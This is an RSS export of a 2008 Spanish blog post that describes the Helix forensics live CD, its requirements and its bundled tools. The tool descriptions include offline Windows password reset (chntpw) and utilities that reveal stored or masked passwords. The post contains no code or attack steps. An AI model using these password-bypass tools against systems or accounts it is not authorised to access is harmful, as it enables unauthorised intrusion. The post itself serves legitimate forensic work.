<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	xmlns:media="http://search.yahoo.com/mrss/"
	>

<channel>
	<title>ToGus DS</title>
	<atom:link href="http://togusds.wordpress.com/feed/" rel="self" type="application/rss+xml" />
	<link>http://togusds.wordpress.com</link>
	<description>In the land of Hyrule</description>
	<lastBuildDate>Tue, 16 Sep 2008 22:41:47 +0000</lastBuildDate>
	<generator>http://wordpress.com/</generator>
	<language>es</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<cloud domain='togusds.wordpress.com' port='80' path='/?rsscloud=notify' registerProcedure='' protocol='http-post' />
<image>
		<url>http://www.gravatar.com/blavatar/f3124648e8526cba2164c561d7a0a2c6?s=96&#038;d=http://s.wordpress.com/i/buttonw-com.png</url>
		<title>ToGus DS</title>
		<link>http://togusds.wordpress.com</link>
	</image>
			<item>
		<title>Helix live CD</title>
		<link>http://togusds.wordpress.com/2008/09/16/helix-live-cd/</link>
		<comments>http://togusds.wordpress.com/2008/09/16/helix-live-cd/#comments</comments>
		<pubDate>Tue, 16 Sep 2008 22:41:47 +0000</pubDate>
		<dc:creator>togusds</dc:creator>
				<category><![CDATA[Auditoria informática]]></category>

		<guid isPermaLink="false">http://togusds.wordpress.com/?p=12</guid>
		<description><![CDATA[ 
Helix
Es un Live CD basado en Knoppix. Centrado en la respuesta a incidentes y la informática forense.
 
Requisitos mínimos
Helix necesita mucha memoria RAM y una arquitectura x86 (Intel, AMD, etc.) Es posible hacerlo funcionar en un sistema con al menos 48MB de RAM, pero no se puede esperar un desempeño óptimo. Se necesita una computadora con procesador [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=togusds.wordpress.com&blog=4815317&post=12&subd=togusds&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<div class='snap_preview'><br /><p> </p>
<p align="justify"><span style="font-family:Arial;font-size:large;"><strong>Helix</strong></span></p>
<p align="justify"><span style="font-family:Arial;font-size:x-small;">Es un Live CD basado en Knoppix. </span><span style="font-family:Arial;font-size:x-small;">Centrado en la respuesta a incidentes y la informática forense.</span></p>
<p align="justify"> </p>
<p align="justify"><span style="font-family:Arial;font-size:small;"><strong>Requisitos mínimos</strong></span></p>
<p align="justify"><span style="font-family:Arial;font-size:x-small;">Helix necesita mucha memoria RAM y una arquitectura x86 (Intel, AMD, etc.) Es posible hacerlo funcionar en un sistema con al menos 48MB de RAM, pero no se puede esperar un desempeño óptimo. Se necesita una computadora con procesador tipo Pentium  con al menos 128 MB de RAM.</span></p>
<p align="justify"><span style="font-family:Arial;font-size:small;"><strong>Instalación Helix</strong></span></p>
<p align="justify"><span style="font-family:Arial;font-size:x-small;">En pocas palabras Helix no se instala en la computadora. El proceso para utilizar Helix es el siguiente:</span></p>
<p align="justify"><span style="font-family:Arial;font-size:x-small;">1) Descargar la imagen de CD desde http://www.e-fense.com/helix/downloads.php</span></p>
<p align="justify"><span style="font-family:Arial;font-size:x-small;">2) Grabar la imagen de CD (Helix.iso) a un CD.</span></p>
<p align="justify"><span style="font-family:Arial;font-size:x-small;">3) Asegúrese de que su máquina puede arrancar desde un CD. (Verificar la BIOS)</span></p>
<p align="justify"><span style="font-family:Arial;font-size:x-small;">4) Reinicie la máquina con el CD en la unidad de CD-ROM.</span></p>
<p align="justify"><span style="font-family:Arial;font-size:x-small;">5) Usar Helix</span><span style="font-family:Arial;font-size:small;">.</span></p>
<p align="justify"><span style="font-family:Arial;font-size:small;"> <br />
<strong><span style="text-decoration:underline;">Herramientas incluidas</span></strong></span></p>
<p align="justify"><span style="font-family:Arial;font-size:small;"><strong>Live CD:</strong></span></p>
<p align="justify"><span style="font-family:Arial;font-size:small;"><strong>2hash (v. 0.2)</strong> </span><span style="font-family:Arial;font-size:x-small;">Una simple herramienta GPL para calcular el md5 y sha1 de un fichero. Si utiliza hashing regularmente este programa le ayudará a ahorrar espacio en disco.</span></p>
<p align="justify"><span style="font-family:Arial;font-size:small;"><strong>Adepto (v. 2.0)</strong> </span><span style="font-family:Arial;font-size:x-small;">con soporte para </span><span style="font-family:Arial;font-size:x-small;">AFF. Programa de imágenes de e-fense utilizando dcfldd.</span></p>
<p align="justify"><span style="font-family:Arial;font-size:small;"><strong>AFF (aimage) (v. 1.6.31)</strong> </span><span style="font-family:Arial;font-size:x-small;">El Advanced Forensic Format (AFF) es un formato abierto para el almacenamiento de imágenes de disco. Proporciona algunas herramientas como compresión, verificación de códigos hash, e información de gestión de meta-datos</span></p>
<p align="justify"><span style="font-family:Arial;font-size:small;"><strong>AIR</strong> <strong>(v. 1.2.8) </strong></span><span style="font-family:Arial;font-size:x-small;">(<em>Automated Image &amp; Restore</em>) es un GUI <em>front-end</em></span><span style="font-family:Arial;font-size:small;"><sup>1</sup></span><span style="font-family:Arial;font-size:x-small;"> para dd y dcfldd diseñado para crear imágenes forenses. Permite verificar mediante MD5/SHA1, unidades de cinta SCSI, imágenes sobre una red TCP / IP, división de imágenes, así como información detallada de los inicios de sesión</span></p>
<p align="justify"><span style="font-family:Arial;font-size:small;"><strong><span style="text-decoration:underline;">Autopsy</span> (v. 2.08)</strong> </span><span style="font-family:Arial;font-size:x-small;">El Autopsy Forensic Browser es una interfaz gráfica para la línea de comandos del Sleuth Kit. Juntos, le permiten investigar el sistema de archivos y los volúmenes de una computadora.</span></p>
<p align="justify"><span style="font-family:Arial;font-size:small;"><strong>chkrootkit (v. 0.46)</strong> </span><span style="font-family:Arial;font-size:x-small;">Script del shell para comprobar el sistema de binarios para la modificación de rootkit.</span></p>
<p align="justify"><span style="font-family:Arial;font-size:small;"><strong>chntpw (v. 0.99.2 040105)</strong> </span><span style="font-family:Arial;font-size:x-small;">Es una utilidad de Linux para (re) establecer la contraseña de cualquier usuario con una cuenta valida (local) en sistemas WinNT o Win2000, modificando el password cifrado en el archivo SAM. No es necesario conocer la contraseña anterior para establecer una nueva. Trabaja <em>off-line</em> (es decir, se debe apagar la computadora y arrancar desde un disco de Linux). El disco de arranque incluye herramientas para acceder a las particiones NTFS. Esta utilidad trabaja con SYSKEY e incluye la opción de apagar la maquina. Se proporciona una imagen de disco de arranque</span></p>
<p align="justify"><span style="font-family:Arial;font-size:small;"><strong>ClamAV (v. 0.88.4)</strong> Programa Anti-Virus</span></p>
<p align="justify"><span style="font-family:Arial;font-size:small;"><strong>dcfldd (v. 1.3.4)</strong> </span><span style="font-family:Arial;font-size:x-small;">Es una versión mejorada de dd con características útiles para la investigación forense y la seguridad.</span></p>
<p align="justify"><span style="font-family:Arial;font-size:small;"><strong>endeavour2 File Manager (v. 2.7.1)</strong>  </span><span style="font-family:Arial;font-size:x-small;">Es una suite completa de gestión de archivos cuenta con un administrador de archivos; navegador de imágenes, archivador, papelera de reciclaje, y un conjunto de aplicaciones para administrar archivos y programas Permite montaje de la unidad de disco, una apariencia completamente personalizable, un sistema de tipos MIME, permite el clásico drag &amp; drop, y es compatible con KDE y GNOME</span></p>
<p align="justify"> <br />
 <br />
 </p>
<p align="justify"><span style="font-family:Arial;font-size:small;"><strong>Ethereal (v. 0.10.13)</strong> </span><a href="http://64.233.179.104/translate_c?hl=es&amp;sl=en&amp;tl=es&amp;u=http://www.ethereal.com/"><span style="font-family:Arial;font-size:small;"><span style="text-decoration:underline;">11]</span></span></a><span style="font-family:Arial;font-size:small;"> </span><span style="font-family:Arial;font-size:x-small;">Es utilizado por profesionales de todo el mundo para la solución de problemas, análisis y desarrollo de protocolos, y como software educativo. Tiene todas las características estándar que se pueden esperar en un analizador de protocolos, y varias características que no se habían visto en ningún otro producto</span></p>
<p align="justify"><span style="font-family:Arial;font-size:small;"><strong>e2recover (v. 1.0)</strong> </span><a href="http://64.233.179.104/translate_c?hl=es&amp;sl=en&amp;tl=es&amp;u=http://www.tucows.com/preview/8192"><span style="font-family:Arial;font-size:small;"><span style="text-decoration:underline;">12]</span></span></a><span style="font-family:Arial;font-size:small;"> </span><span style="font-family:Arial;font-size:x-small;">Es una herramientas que ayuda en la recuperación de archivos borrados de los sistemas de ficheros ext2.</span></p>
<p align="justify"><span style="font-family:Arial;font-size:small;"><strong>e2undel (v. 0.82)</strong> </span><a href="http://64.233.179.104/translate_c?hl=es&amp;sl=en&amp;tl=es&amp;u=http://e2undel.sourceforge.net/"><span style="font-family:Arial;font-size:small;"><span style="text-decoration:underline;">13]</span></span></a><span style="font-family:Arial;font-size:small;"> </span><span style="font-family:Arial;font-size:x-small;">Se trata de una consola interactiva que recupera los datos de archivos borrados en un sistema de ficheros ext2.</span></p>
<p align="justify"><span style="font-family:Arial;font-size:small;"><strong>fatback (v. 1.3)</strong> </span><a href="http://64.233.179.104/translate_c?hl=es&amp;sl=en&amp;tl=es&amp;u=http://sourceforge.net/project/showfiles.php%3Fgroup_id%3D4603"><span style="font-family:Arial;font-size:small;"><span style="text-decoration:underline;">14]</span></span></a><span style="font-family:Arial;font-size:small;"> </span><span style="font-family:Arial;font-size:x-small;">Un programa utilizado para recuperar archivos borrados de un sistema de ficheros FAT.</span></p>
<p align="justify"><span style="font-family:Arial;font-size:small;"><strong>Firefox (v. 1.5.0.1)</strong> </span><a href="http://64.233.179.104/translate_c?hl=es&amp;sl=en&amp;tl=es&amp;u=http://www.mozilla.com/en-US/firefox/all.html"><span style="font-family:Arial;font-size:small;"><span style="text-decoration:underline;">15]</span></span></a><span style="font-family:Arial;font-size:small;"> </span><span style="font-family:Arial;font-size:x-small;">Navegador de Internet.</span></p>
<p align="justify"><span style="font-family:Arial;font-size:small;"><strong>foomatic-gui (v. 0.7.4.17)</strong> </span><a href="http://64.233.179.104/translate_c?hl=es&amp;sl=en&amp;tl=es&amp;u=http://freshmeat.net/projects/foomatic-gui/"><span style="font-family:Arial;font-size:small;"><span style="text-decoration:underline;">16]</span></span></a><span style="font-family:Arial;font-size:small;"> </span><span style="font-family:Arial;font-size:x-small;">Es un sistema de base de datos para integrar software libre con los controladores de impresora comunes bajo Unix. Soporta CUPS, LPRng, LPD, GNUlpr, Solaris LP, PPR, PDQ, CPS, e impresión directa con el software libre conocido para impresoras y cada impresora que se sabe funciona con estos drivers.</span></p>
<p align="justify"><span style="font-family:Arial;font-size:small;"><strong>foremost (v. 1.3)</strong> </span><a href="http://64.233.179.104/translate_c?hl=es&amp;sl=en&amp;tl=es&amp;u=http://foremost.sourceforge.net/"><span style="font-family:Arial;font-size:small;"><span style="text-decoration:underline;">17]</span></span></a><span style="font-family:Arial;font-size:x-small;"> Es un programa de consola para recuperar los archivos basándose en sus cabeceras, fin de archivo, y las estructuras de datos internas. Este proceso se conoce comúnmente como <em>data carving</em>. Puede trabajar en los archivos de imagen, como los generados por dd, Safeback, Encase, etc, o directamente en el disco. La configuración de  encabezados y los finales de archivos se pueden especificar de una plantilla o bien se puede utilizar la línea de comandos para especificar una función de los tipos de archivos predeterminados. Estos permiten una más fiable y rápida recuperación.</span></p>
<p align="justify"><span style="font-family:Arial;font-size:small;"><strong>ftimes (v. 3.4.0)</strong> </span><a href="http://64.233.179.104/translate_c?hl=es&amp;sl=en&amp;tl=es&amp;u=http://ftimes.sourceforge.net/FTimes/"><span style="font-family:Arial;font-size:small;"><span style="text-decoration:underline;">18]</span></span></a><span style="font-family:Arial;font-size:small;"> </span><span style="font-family:Arial;font-size:x-small;">FTimes es un sistema <em>baselining</em><sup>2</sup> y de recopilación de pruebas. El objetivo principal de FTimes es reunir y / o desarrollar la información detallada y los atributos especificados acerca de directorios y archivos de modo que favorezcan el análisis de intrusiones y el análisis forense.</span></p>
<p align="justify"><span style="font-family:Arial;font-size:small;"><strong>galleta (v. 1.0)</strong> </span><a href="http://64.233.179.104/translate_c?hl=es&amp;sl=en&amp;tl=es&amp;u=http://www.foundstone.com/resources/proddesc/galleta.htm"><span style="font-family:Arial;font-size:small;"><span style="text-decoration:underline;">19]</span></span></a><span style="font-family:Arial;font-size:small;"> </span><span style="font-family:Arial;font-size:x-small;">galleta analiza la información de un archivo de cookies y permite que el resultado sea importado a su programa de hoja de cálculo favorita. Galleta está construido para trabajar en múltiples plataformas y se ejecutará en Windows (a través de Cygwin), Mac OS X, Linux y plataformas * BSD.</span></p>
<p align="justify"><span style="font-family:Arial;font-size:small;"><strong>Gcombust &#8211; Graphical CD Burner (v. 0.1.55-2)</strong> </span><a href="http://64.233.179.104/translate_c?hl=es&amp;sl=en&amp;tl=es&amp;u=http://www.abo.fi/~jmunsin/gcombust/"><span style="font-family:Arial;font-size:small;"><span style="text-decoration:underline;">20]</span></span></a><span style="font-family:Arial;font-size:x-small;"> gcombust es un frontend<sup>3</sup> GTK+ para mkisofs, mkhybrid, cdrecord y cdlabelgen. Tiene un primitivo soporte para controlar el directorio (root) estructura y el tamaño de una imagen sin copiar archivos / symlinking<sup>4</sup> o escribir 10 líneas de argumentos. También puede maximizar el uso de disco de insinuando que directorios / archivos usar.</span></p>
<p align="justify"><span style="font-family:Arial;font-size:small;"><strong>GHex (v. 2.8.1)</strong> </span><a href="http://64.233.179.104/translate_c?hl=es&amp;sl=en&amp;tl=es&amp;u=http://directory.fsf.org/ghex.html"><span style="font-family:Arial;font-size:small;"><span style="text-decoration:underline;">21]</span></span></a><span style="font-family:Arial;font-size:small;"> </span><span style="font-family:Arial;font-size:x-small;">GHex es un simple editor binario. Permite a los usuarios ver y editar un archivo binario en hexadecimal y ASCII con un sistema de deshacer / rehacer. Permite buscar y reemplazar funciones, conversión entre binario, octal, decimal y hexadecimal, el concepto MDI permite a los usuarios editar varios documentos con múltiples vistas de cada uno.</span></p>
<p align="justify"><span style="font-family:Arial;font-size:small;"><strong>GQView (v. 2.0.1)</strong> </span><a href="http://64.233.179.104/translate_c?hl=es&amp;sl=en&amp;tl=es&amp;u=http://gqview.sourceforge.net/"><span style="font-family:Arial;font-size:small;"><span style="text-decoration:underline;">22]</span></span></a><span style="font-family:Arial;font-size:small;"> </span><span style="font-family:Arial;font-size:x-small;">Un navegador de imágenes que permite acceder y ver el árbol de directorios.</span></p>
<p align="justify"><span style="font-family:Arial;font-size:small;"><strong>Graveman &#8211; Graphical CD Burner (v. 0.3.12-4-2.1)</strong> </span><a href="http://64.233.179.104/translate_c?hl=es&amp;sl=en&amp;tl=es&amp;u=http://graveman.tuxfamily.org/"><span style="font-family:Arial;font-size:small;"><span style="text-decoration:underline;">23]</span></span></a><span style="font-family:Arial;font-size:small;"> </span><span style="font-family:Arial;font-size:x-small;">es una GUI para herramientas de CD (permite grabar, leer y mkisofs<sup>5</sup>) Permite grabar archivos en un CD (como Wav, Ogg, Mp3, o FLAC) y datos, ademas de hacer copias de CD</span></p>
<p align="justify"><span style="font-family:Arial;font-size:small;"><strong>grepmail (v. 5.3032)</strong> </span><a href="http://64.233.179.104/translate_c?hl=es&amp;sl=en&amp;tl=es&amp;u=http://grepmail.sourceforge.net/"><span style="font-family:Arial;font-size:small;"><span style="text-decoration:underline;">24]</span></span></a><span style="font-family:Arial;font-size:small;"> </span><span style="font-family:Arial;font-size:x-small;">grepmail realiza búsquedas en un buzón de correo normal o comprimido (gzip, bzip2, o tzip) para una determinada expresión regular y devuelve los mensajes que coincidan con la consulta. También puede realizar búsquedas limitadas por la fecha y el tamaño. </span> <br />
 </p>
<p align="justify"><span style="font-family:Arial;font-size:small;"><strong>md5deep Suite (v. 1.12)</strong> </span><a href="http://64.233.179.104/translate_c?hl=es&amp;sl=en&amp;tl=es&amp;u=http://md5deep.sourceforge.net/"><span style="font-family:Arial;font-size:small;"><span style="text-decoration:underline;">26]</span></span></a><span style="font-family:Arial;font-size:small;"> </span><span style="font-family:Arial;font-size:x-small;">Es un conjunto de programas multiplataforma para calcular MD5, SHA-1, SHA-256, Tigre. Los programas se ejecutan en Windows, Linux, Cygwin, * BSD, OS X, Solaris, y debe correr en la mayoría de las otras plataformas. md5deep es similar a la suma md5 del programa que se encuentra en el paquete GNU Coreutils.</span></p>
<p align="justify"><span style="font-family:Arial;font-size:small;"><strong>mac_grab (v. 1.0)</strong> </span><a href="http://64.233.179.104/translate_c?hl=es&amp;sl=en&amp;tl=es&amp;u=http://www.e-fense.com/helix/"><span style="font-family:Arial;font-size:small;"><span style="text-decoration:underline;">27]</span></span></a><span style="font-family:Arial;font-size:small;"> </span><span style="font-family:Arial;font-size:x-small;">Programa de e-fense creado para apoderarse de todos los tiempos MAC de un sistema.</span></p>
<p align="justify"><span style="font-family:Arial;font-size:small;"><strong>Magicrescue (v. 1.1.4) </strong></span><a href="http://64.233.179.104/translate_c?hl=es&amp;sl=en&amp;tl=es&amp;u=http://jbj.rapanden.dk/magicrescue/"><span style="font-family:Arial;font-size:small;"><span style="text-decoration:underline;">28]</span></span></a><span style="font-family:Arial;font-size:small;"> </span><span style="font-family:Arial;font-size:x-small;">Escanea un bloque de dispositivos para encontrar los tipos de archivos que sabe recuperar y llama un programa externo para ello. Busca en los “bytes mágicos”, así que puede ser utilizado como una utilidad de recuperación o para recobrar un dispositivo dañado o bien una partición. Mientras los datos del archivo se encuentren allí, los encontrará. Funciona en cualquier sistema de ficheros, pero si el sistema de archivos esta muy fragmentado sólo puede recuperar la primera parte de cada archivo.</span></p>
<p align="justify"><span style="font-family:Arial;font-size:small;"><strong>NTFS-3G (c. 2006-08-22-BETA) </strong></span><a href="http://64.233.179.104/translate_c?hl=es&amp;sl=en&amp;tl=es&amp;u=http://www.ntfs-3g.org/"><span style="font-family:Arial;font-size:small;"><span style="text-decoration:underline;">29]</span></span></a><span style="font-family:Arial;font-size:small;"> </span><span style="font-family:Arial;font-size:x-small;">Finalmente Linux tiene total soporte para leer / escribir en particiones NTFS. Pruebas preliminares mostraron que aun con <em>drivers</em> no optimizados algunas veces se logran velocidades que duplican la velocidad de ext3 y que son entre 20 y 50 veces más rápido que el NTFS comercial de Paragon. Es interesante mencionar que Captive NTFS, que usa el driver nativo de Windows, falló todas las pruebas provocando perdida de datos</span></p>
<p align="justify"><span style="font-family:Arial;font-size:small;"><strong>Outguess (v. 0.2)</strong> </span><a href="http://64.233.179.104/translate_c?hl=es&amp;sl=en&amp;tl=es&amp;u=http://www.outguess.org/"><span style="font-family:Arial;font-size:small;"><span style="text-decoration:underline;">30]</span></span></a><span style="font-family:Arial;font-size:small;"> </span><span style="font-family:Arial;font-size:x-small;">Versión mejorada del stegdetec. Stegdetect es ahora compatible con el análisis lineal discriminante para detectar cualquier sistema JPEG basado en stego. También ofrece una mejor detección de F5.</span></p>
<p align="justify"><span style="font-family:Arial;font-size:small;"><strong>Pasco (v. 1.0</strong>) </span><a href="http://64.233.179.104/translate_c?hl=es&amp;sl=en&amp;tl=es&amp;u=http://www.foundstone.com/resources/proddesc/pasco.htm"><span style="font-family:Arial;font-size:small;"><span style="text-decoration:underline;">31]</span></span></a><span style="font-family:Arial;font-size:small;"> </span><span style="font-family:Arial;font-size:x-small;">Pasco analiza la información en un fichero index.dat y los resultados pueden ser importados a su programa de hoja de cálculo favorito. Pasco está construido para trabajar en múltiples plataformas y se ejecutará en Windows (a través de Cygwin), Mac OS X, Linux y plataformas * BSD.</span></p>
<p align="justify"><span style="font-family:Arial;font-size:small;"><strong>PyFlag (v. 0.80.1)</strong> </span><a href="http://64.233.179.104/translate_c?hl=es&amp;sl=en&amp;tl=es&amp;u=http://pyflag.sourceforge.net/"><span style="font-family:Arial;font-size:small;"><span style="text-decoration:underline;">32]</span></span></a><span style="font-family:Arial;font-size:small;"> </span><span style="font-family:Arial;font-size:x-small;">FLAG (<em>Forensic and Log Analysis GUI</em>) fue diseñado para simplificar el proceso de análisis de archivos de registro y de investigaciones forenses. Con frecuencia, al investigar un caso muy grande, se necesita analizar y correlacionar una gran cantidad de datos. PyFlag utiliza una base de datos backend<sup>6</sup> para ayudar en la gestión de grandes volúmenes de datos. Esto permite a PyFlag permanecer receptivo y agilizar las operaciones de manipulación de datos.</span></p>
<p align="justify"><span style="font-family:Arial;font-size:small;"><strong>qtparted (v. 0.4.5-cvs)</strong> </span><a href="http://64.233.179.104/translate_c?hl=es&amp;sl=en&amp;tl=es&amp;u=http://qtparted.sourceforge.net/"><span style="font-family:Arial;font-size:small;"><span style="text-decoration:underline;">33]</span></span></a><span style="font-family:Arial;font-size:small;"> </span><span style="font-family:Arial;font-size:x-small;">QTParted es un clon de Partition Magic escrito en C + + usando el kit de herramientas denominado Qt, permite por tanto crear, modificar y eliminar particiones en un disco duro.</span></p>
<p align="justify"><span style="font-family:Arial;font-size:small;"><strong>Retriever (v. 2.0)</strong> </span><a href="http://64.233.179.104/translate_c?hl=es&amp;sl=en&amp;tl=es&amp;u=http://www.e-fense.com/helix/"><span style="font-family:Arial;font-size:small;"><span style="text-decoration:underline;">34]</span></span></a><span style="font-family:Arial;font-size:small;"> </span><span style="font-family:Arial;font-size:x-small;">Programa de e-fense creado para dar un vistazo rápido a un sistema e identificar las imágenes, los documentos de texto y otros tipos de archivos.</span></p>
<p align="justify"><span style="font-family:Arial;font-size:small;"><strong>rkhunter (v. 1.2.7)</strong> </span><a href="http://64.233.179.104/translate_c?hl=es&amp;sl=en&amp;tl=es&amp;u=http://rkhunter.sourceforge.net/"><span style="font-family:Arial;font-size:small;"><span style="text-decoration:underline;">35]</span></span></a><span style="font-family:Arial;font-size:small;"> </span><span style="font-family:Arial;font-size:x-small;">Rootkit Hunter escanea los archivos y sistemas de rootkits conocidos y desconocidos, back doors y sniffers. El paquete contiene un script para el shell, unas pocas bases de datos basados en texto, y módulos opcionales escritos en Perl. Debe ejecutarse en cualquier clon de Unix.</span></p>
<p align="justify"><span style="font-family:Arial;font-size:small;"><strong>regviewer (v. 0.1)</strong> </span><a href="http://64.233.179.104/translate_c?hl=es&amp;sl=en&amp;tl=es&amp;u=http://sourceforge.net/projects/regviewer/"><span style="font-family:Arial;font-size:small;"><span style="text-decoration:underline;">36]</span></span></a><span style="font-family:Arial;font-size:small;"> </span><span style="font-family:Arial;font-size:x-small;">Basado en la GUI del navegador de registro de Windows. Es independiente de la plataforma permitiendo examinar el registro de Windows desde cualquier otra plataforma. Es particularmente útil cuando se realizan análisis forenses de archivos Windows desde un sistema del tipo *nix</span></p>
<p align="justify"><span style="font-family:Arial;font-size:small;"><strong>rifiuti (v. 1.0)</strong> </span><a href="http://64.233.179.104/translate_c?hl=es&amp;sl=en&amp;tl=es&amp;u=http://www.foundstone.com/resources/proddesc/rifiuti.htm"><span style="font-family:Arial;font-size:small;"><span style="text-decoration:underline;">37]</span></span></a><span style="font-family:Arial;font-size:small;"> </span><span style="font-family:Arial;font-size:x-small;">Rifiuti analizará la información en un archivo INFO2 y  los resultados podrán ser importados a su programa de hoja de cálculo favorita. Rifiuti está construido para trabajar en múltiples plataformas y se ejecutará en Windows (a través de Cygwin), Mac OS X, Linux y plataformas * BSD.</span></p>
<p align="justify"><span style="font-family:Arial;font-size:small;"><strong>Scalpel</strong> (v. 1.54) </span><a href="http://64.233.179.104/translate_c?hl=es&amp;sl=en&amp;tl=es&amp;u=http://www.digitalforensicssolutions.com/Scalpel/"><span style="font-family:Arial;font-size:small;"><span style="text-decoration:underline;">38]</span></span></a><span style="font-family:Arial;font-size:small;"> </span><span style="font-family:Arial;font-size:x-small;">Una herramienta digital forense utilizada para el modelado<sup>7</sup> de datos de archivos de una imagen de disco basándose en el archivo de configuración de requerimientos.</span></p>
<p align="justify"><span style="font-family:Arial;font-size:small;"><strong><span style="text-decoration:underline;">Sleuthkit</span></strong></span><span style="font-family:Arial;color:#0000ff;font-size:small;"><strong><span style="text-decoration:underline;"> </span></strong></span><span style="font-family:Arial;font-size:small;"><strong>(v. 2.06)</strong> </span><a href="http://64.233.179.104/translate_c?hl=es&amp;sl=en&amp;tl=es&amp;u=http://www.sleuthkit.org/index.php"><span style="font-family:Arial;font-size:small;"><span style="text-decoration:underline;">39]</span></span></a><span style="font-family:Arial;font-size:small;"> </span><span style="font-family:Arial;font-size:x-small;">Es una colección de herramientas de línea de comandos basadas en UNIX que permiten investigar un computadora. La orientación actual de las herramientas es el archivo y sistemas de volumen y TSK soporta sistemas de ficheros FAT, Ext2 / 3, NTFS, UFS, ISO 9660.</span><span style="font-family:Arial;font-size:small;"> </span> </p>
<p align="justify"><span style="font-family:Arial;font-size:small;"><strong>ssdeep (v. 1.1)</strong> </span><a href="http://64.233.179.104/translate_c?hl=es&amp;sl=en&amp;tl=es&amp;u=http://ssdeep.sourceforge.net/"><span style="font-family:Arial;font-size:small;"><span style="text-decoration:underline;">40]</span></span></a><span style="font-family:Arial;font-size:small;"> </span><span style="font-family:Arial;font-size:x-small;">Calcula un suma de verificación o checksum basados en los archivos que se crearon a partir del <em>piecewise hashes</em><sup><em>8</em></sup>. Se puede especificar al programa que verifique estas sumas contra un archivo de sumas conocidas y que reporte cualquier coincidencia. La salida es escrita a la “salida normal”, mientras que los errores son enviados a “error estándar”.</span></p>
<p align="justify"><span style="font-family:Arial;font-size:small;"><strong>Xfprot (v. 1.13)</strong> </span><a href="http://64.233.179.104/translate_c?hl=es&amp;sl=en&amp;tl=es&amp;u=http://web.tiscali.it/sharp/xfprot/"><span style="font-family:Arial;font-size:small;"><span style="text-decoration:underline;">43]</span></span></a><span style="font-family:Arial;font-size:small;"> </span><span style="font-family:Arial;font-size:x-small;">XFPROT es una interfaz gráfica para el Antivirus F-Prot de Linux Small Business Edition. F-Prot Antivirus para Linux ha sido desarrollado por Frisk Software Internacional y es gratuito para uso personal y se puede descargar desde www.f-prot.com.</span></p>
<p align="justify"><span style="font-family:Arial;font-size:small;"><strong>xhfs (v. 3.2.6)</strong> </span><a href="http://64.233.179.104/translate_c?hl=es&amp;sl=en&amp;tl=es&amp;u=http://www.mars.org/home/rob/proj/hfs/"><span style="font-family:Arial;font-size:small;"><span style="text-decoration:underline;">44]</span></span></a><span style="font-family:Arial;font-size:small;"> </span><span style="font-family:Arial;font-size:x-small;">xhfs Es un explorador para la navegación y copia de archivos en volúmenes HFS.</span></p>
<p align="justify"><span style="font-family:Arial;font-size:small;"><strong>Xine-ui (v. 0.99.3)</strong> </span><a href="http://64.233.179.104/translate_c?hl=es&amp;sl=en&amp;tl=es&amp;u=http://xinehq.de/"><span style="font-family:Arial;font-size:small;"><span style="text-decoration:underline;">45]</span></span></a><span style="font-family:Arial;font-size:small;"> </span><span style="font-family:Arial;font-size:x-small;">Es un reproductor multimedia libre. Reproduce CDs, DVDs y VCDs. También decodifica archivos multimedia en formato AVI, MOV, WMV, MP3, locales, y archivos multimedia a través de Internet. Interpreta muchos de los formatos multimedia más comunes.</span></p>
<p align="justify"><span style="font-family:Arial;font-size:small;"><strong>Xmms (v. 1.2.10)</strong> </span><a href="http://64.233.179.104/translate_c?hl=es&amp;sl=en&amp;tl=es&amp;u=http://freshmeat.net/projects/xmms/"><span style="font-family:Arial;font-size:small;"><span style="text-decoration:underline;">46]</span></span></a><span style="font-family:Arial;font-size:small;"> </span><span style="font-family:Arial;font-size:x-small;">Es un reproductor multimedia basado en el aspecto gráfico de WinAmp. XMMS interpreta MPEG 1/2/3, Ogg Vorbis, WAV, todos los formatos soportados por libmikmod, y CDs de audio</span><span style="font-family:Arial;font-size:small;">.</span></p>
<p align="justify"><span style="font-family:Arial;font-size:small;"><strong>xpdf (v. 3.01)</strong> </span><a href="http://64.233.179.104/translate_c?hl=es&amp;sl=en&amp;tl=es&amp;u=http://www.foolabs.com/xpdf/"><span style="font-family:Arial;font-size:small;"><span style="text-decoration:underline;">47]</span></span></a><span style="font-family:Arial;font-size:small;"> </span><span style="font-family:Arial;font-size:x-small;">Es un visor de PDF, incluye también un extractor de texto PDF, un convertidor de PDF-a-PostScript</span><span style="font-family:Arial;font-size:small;">, </span> <br />
 <br />
 <br />
 </p>
<p align="justify"><span style="font-family:Arial;font-size:small;"><strong>Herramientas que corren bajo Windows </strong></span> <br />
 </p>
<p align="justify"><span style="font-family:Arial;font-size:small;"><strong>Access PassView (v. 1.12)</strong> </span><a href="http://64.233.179.104/translate_c?hl=es&amp;sl=en&amp;tl=es&amp;u=http://www.nirsoft.net/utils/accesspv.html"><span style="font-family:Arial;font-size:small;"><span style="text-decoration:underline;">48]</span></span></a><span style="font-family:Arial;font-size:small;"> </span><span style="font-family:Arial;font-size:x-small;">Es una utilidad que permite acceder a la base de datos de contraseñas almacenados en un archivo mdb creados con Microsoft Access 95/97/200/XP o con el motor de base de datos Jet 3.0/4.0 Es muy útil si se olvida la contraseña de acceso</span></p>
<p align="justify"><span style="font-family:Arial;font-size:small;"><strong>Astrick Logger (v. 1.02)</strong> </span><a href="http://64.233.179.104/translate_c?hl=es&amp;sl=en&amp;tl=es&amp;u=http://www.nirsoft.net/utils/astlog.html"><span style="font-family:Arial;font-size:small;"><span style="text-decoration:underline;">49]</span></span></a><span style="font-family:Arial;font-size:small;"> </span><span style="font-family:Arial;font-size:x-small;">Muchas aplicaciones como CuteFTP, CoffeeCup Free FTP, VNC, IncrediMail, Outlook Express y otros, permite escribir una contraseña general, el texto, al introducir una contraseña se muestra como una secuencia de asteriscos (***). Esta utilidad revela las contraseñas almacenadas.</span></p>
